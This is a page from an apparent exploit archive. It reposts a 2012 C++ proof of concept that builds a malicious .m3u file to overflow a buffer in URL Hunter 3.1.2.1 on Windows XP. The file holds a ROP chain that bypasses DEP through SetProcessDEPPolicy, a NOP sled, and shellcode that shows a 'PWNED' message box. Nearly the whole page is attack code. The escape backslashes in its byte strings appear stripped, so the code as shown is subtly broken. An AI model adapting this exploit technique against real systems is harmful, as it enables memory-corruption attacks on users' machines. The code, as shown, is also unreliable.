[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : URL Hunter Buffer Overflow DEP Bypass
# Published : 2012-06-21
# Author :
# Previous Title : Windows Escalate Task Scheduler XML Privilege Escalation
# Next Title : wicd Local Privilege Esclation Exploit
/*######################################################################
Exploit Title: URL Hunter buffer overflow DEP Bypass
Author: Ayrbyte
Vendor or Software Link: Mini-stream Software
Link : http://mini-stream.net/url-hunter/
Version: 3.1.2.1
Category: local
Tested on: Windows XP sp 2
Code : c++
Fb : /Ayrbyte
########################################################################
Greetz To :
XerkusR, Kira, 3|_^^1x, WPFr, C-byte, H4mz_JR, Ch0lise7en, R31tuz
Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky,
Zet Dot Exe, Gabby X-Friends, Valcon Trignome
and all CREMY & b-compi family
######################################################################*/
//NOTE: Path Ayrbyte.m3u must be on the c://Ayrbyte.m3u
#include <cstdio>
#include <iostream>
using namespace std;
int main(){
char header[] = "http://";
char buff[] = "x41";
char eip[] = "x16x10x9cx7c";//#retn |SHELL32.dll
char nop[] = "x90";
//call MessageBoxA "PWNED by Ayrbyte...! ^_^"
char code[] =
"xB8x36xC6x0Dx10" //#MOV EAX,100DC636
"xB9xFFxFFxFFx0F" //#MOV ECX,0FFFFFFF
"xBAxFFxFFxFFx0F" //#MOV EDX,0FFFFFFF
"x2BxC1x2BxD1x52" //#SUB EAX,ECX #SUB EDX,ECX #PUSH EDX
"x50x90x90x90x90" //#PUSH EAX #NOP #NOP #NOP #NOP
"x90x50x90x90x90" //#NOP #PUSH EAX #NOP #NOP #NOP
"x90x52x90" //#NOP #PUSH EDX #NOP
"xE8xD5x3ExCAx77" //<---CALL USER32.MessageBoxA
//string "PWNED By Ayrbyte...! ^_^"
"x20x50x57x4Ex45x44x20x42x79x20x41x79"
"x72x62x79x74x65x2Ex2Ex2Ex21x20x5Ex5Fx5E";
//SetProcessDEPPolicy
char rop[] =
"x41x41x41x41" //agar mengarah ke esp
"x42x02x9Fx7C" //#pop ebx #retn |shell32.dll
"xFFxFFxFFxFF" //<--akan di taruh di ebx
"xD8x85xA4x7C" //#inc ebx #retn |shell32.dll
"xAFxCFxA4x7C" //#pop ebp #retn |shell32.dll
"xA4x22x86x7C" //#<- SetProcessDEPPolicy, ke EBP
"xCAx2ExAEx7c" //#pop edi #retn |shell32.dll
"xCBx2ExAEx7C" //#retn |shell32.dll
"xFEx2ExAEx7C" //#pop esi #retn |shell32.dll
"xCBx2ExAEx7C" //#retn |shell32.dll
"x01x4Ex9Ex7C" //#xor eax,eax #retn |shell32.dll
"x1DxC9x91x7C" //#xor ecx,ecx #retn |ntdll.dll
"x8Ex09xF3x77" //#xor edx,edx #retn |gdi32.dll
"x65x82xA5x7C";//#jmp esp |shell32.dll
//Make Exploit File
FILE *teksfile;
teksfile = fopen("c:\Ayrbyte.m3u", "w");
fputs(header, teksfile);
for(int i=0; i < 17417; i++){fputs(buff, teksfile);}
fputs(eip, teksfile);
fputs(rop, teksfile);
for(int i=0; i < 28; i++){fputs(nop, teksfile);}
fputs(code, teksfile);
fclose(teksfile);
return 0;}
/*###############################################################
#we are CREMY ########## ###### ###### ## ##
#we are unity ## ###### ## ## ## ## ## ##
#we love peace ## ###### ## ## ## ## ## ## ##
#we crazy but not lazy ## ## ## ########### #### ## ####
#what about you...? ## ###### ## ## ## ###
#be crazy now...! ## ## ## ###### ## ## ##
################################## ## ## ##
## ## ####################### */